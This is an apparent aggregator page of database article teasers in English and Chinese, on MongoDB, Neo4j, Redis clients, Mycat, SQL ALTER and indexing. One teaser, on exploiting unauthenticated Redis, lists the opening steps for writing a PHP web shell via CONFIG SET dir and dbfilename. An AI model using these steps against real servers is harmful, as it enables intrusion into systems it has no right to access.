Percona Monitoring and Management (PMM) Graphs Explained: MongoDB with RocksDB
This post is part of the series of Percona’s MongoDB 3.4 bundle release blogs. In mid-2016, Percona Monitoring and Management (PMM) added support for RocksDB with MongoDB, also known as “MongoRocks.”...
View ArticleFeature flagging to mitigate risk in database migration
There comes a time in every developer’s life when you realize you need to migrate from one database to another. Maybe you started off with MongoDB, and it was great while your app was small, but it...
View ArticleMark Needham: Neo4j: How do null values even work?
Every now and then I find myself wanting to import a CSV file into Neo4j and I always get confused with how to handle the various null values that can lurk within. Let’s start with an example that...
View ArticleDocumentDB Caching Tips
I’ve started to use DocumentDB a bit more over the last couple weeks and I’m really enjoying it. The first real world scenario that I hit was needing to implement optimistic concurrency . This led me...
View ArticleRedis未授权 利用合集
姿势一:结合web服务写shell 满足 条件: 1:开启了WEB服务 2:知道web程序的绝对路径 3:Redis 以root权限执行 符合以上三个条件,就可以通过 redis 未授权 getshell CONFIG SET dir /var/www/html # 修改备份目录 CONGIG SET dbfilename shell.php # 修改备份文件名为我们的shell名 SET...
View ArticleTheo 3.0 Release: The Swift Framework for Neo4j
By Niklas Saers & Cory D. Wiles , Neo4j Community Members | February 23, 2017 Theo , the Swift framework for interfacing withNeo4j, is now available in version 3.0. With this version, Theo gets...
View ArticleMongoDB Plugin 1.0.8.1 发布
MongoDB Plugin更新到1.0.8.1,主要是修复一些bug、支持更多类型自动转换为docment对象、更改默认授权方式、增加多种授权验证 MongoDB Plugin可能java上最好用而且实时跟进官方版本的ORM,让您更加舒适地使用MongoDB。 与MongoDB版本基本同步(基于最新3.4.0) 使用方式更像是自然语言,用起来更舒适 几乎没有任何学习成本...
View ArticleDoubling Efficiency with Digital Twins
In five years’ time, it’s quite likely that devices will run much of the world through their own private Internet of Things. There could be billions of them and they’ll all have their own virtual...
View ArticleRedisson 3.3.0 和 2.8.0 发布,Redis 客户端
Redisson 3.3.0 和 2.8.0 发布了。Redisson 是基于Redis服务之上构建的分布式、可伸缩的 Java 数据结构,高级的 Redis 客户端。更新如下: Feature - RClusteredLocalCachedMap 对象已添加更多细节 here Feature - RClusteredMapCache 对象已添加更多细节 here Feature -...
View Articlemongdb学习笔记
学习数据库的最好方法,是从官方文档开始看起。mongodb的官方文档在 这里 ,但是也有中文翻译的版本,可见 这里 (中文翻译貌似还没完全翻译完,还有不少段落是英文的。)。 mongodb目前最新的版本是3.4版本。注:3.4版本不在支持x86 32位的系统。 (1)安装: (1.1) 准备3台机器,分别是mongodb1,mongodb2,mongodb3。在3台机器上,分别:...
View Articlearangoexport a tool for exporting data from ArangoDB
With the release of the initial alpha of ArangoDB version 3.2 we also include the preview of the new export tool arangoexport . Alpha2 of ArangoDB 3.2 can bedownloaded here. An export functionality...
View Article重磅!2017大数据十大趋势
随着对不同类型、不同体量数据的结构化存储、批量处理以及价值挖掘需求的增多,2016年注定是大数据里程碑式的一年。 2017年,支持大量结构化和非结构化数据的系统将继续增长。市场需要数据平台来帮助数据管理人员管理和保护大数据,同时允许最终用户进行数据分析。这些系统将逐步成熟,在企业内部的IT系统中更好地运行。 1、数据处理变得更加快速,数据也变得更加易于使用 选项扩展将加速Hadoop...
View ArticleRedis入门指南(第2版)PDF
Redis入门指南(第2版)真正零基础入门,深入浅出全面剖析Redis知识,涵盖Redis 3.0的全新内容。 Redis是一个十分热门的内存数据库,它拥有诸多优良特性,已经被越来越多的公司采用,值得每一位Web开发者学习。...
View ArticleThe Good of Event Sourcing: Conflict Handling
Event sourcing is a brilliant solution for high-performance or complex business systems, but you need to be aware that it also introduces challenges most people don't tell you about. In June, I blogged...
View ArticleUbuntu获取root权限 Ubuntu教程 Ubuntu获取权限 root权限 怎么获取root权限
1. 打开终端,快捷键:alt + ctrl + T; 2. 输入 sudo passwd root (设置root密码),需要先输入登录密码,然后设置新root密码; 3. 设置完成后,终端输入su按enter键即可获取root权限;
View Article数据库alter用法总结 alter用法 数据库alter 数据库 alter总结
菜鸟如我,因为需求总是变个不停,所以对表字段的动态的增删改查是必须要记得: 1:删除列ALTER TABLE 【表名】 DROP 【列名】2:增加列ALTER TABLE 【表名】 ADD 【列名】 【类型】alter table table1 add transactor varchar(10) not Null;3:重命名列ALTER TABLE 【表名】 CHANGE 【列名】【新名】...
View ArticleMycat入门教程 Mycat Mycat教程 Mycat入门 开发数据库
mycat介绍介绍在官方网站上有比较详细的介绍,在这里复制粘贴没什么意思,大家到官网上看 官网链接前置条件本教程是在window环境下运行的,实际生产推荐在linux上运行。必备条件(自行安装,如果不会装请先打好基础在来学习):JDK:建议是1.7及其以上。 mysql:必须是5.5及其以上。拓扑结构两张表users和item,三个数据库db01,db02,db03(三个库在一个数据库实例上)...
View Article数据库驱动程序 数据库驱动程序是什么 数据库驱动 数据库 驱动程序
一、什么是数据库驱动程序? JDK提供jdbc接口,就是java怎样去调用数据库,但是注意提供的只是接口,数据库提供商实现这些接口,就是所谓数据库驱动。 java调用数据库驱动,驱动真正执行数据库操作。 二、常用数据库的驱动程序 Oracle数据库: 驱动程序包名:ojdbc14.jar 驱动类的名字:oracle.jdbc.driver.OracleDriver JDBC...
View Article何时使用聚集索引或非聚集索引 聚集索引 非聚集索引 聚集索引怎么使用
下面的表总结了何时使用聚集索引或非聚集索引(很重要)。动作描述 使用聚集索引 使用非聚集索引外键列 应 应主键列 应 应列经常被分组排序(order by) 应 应返回某范围内的数据 应 不应小数目的不同值 应 不应大数目的不同值 不应 应频繁更新的列 不应 应频繁修改索引列 不应 应一个或极少不同值 不应 不应...
View Article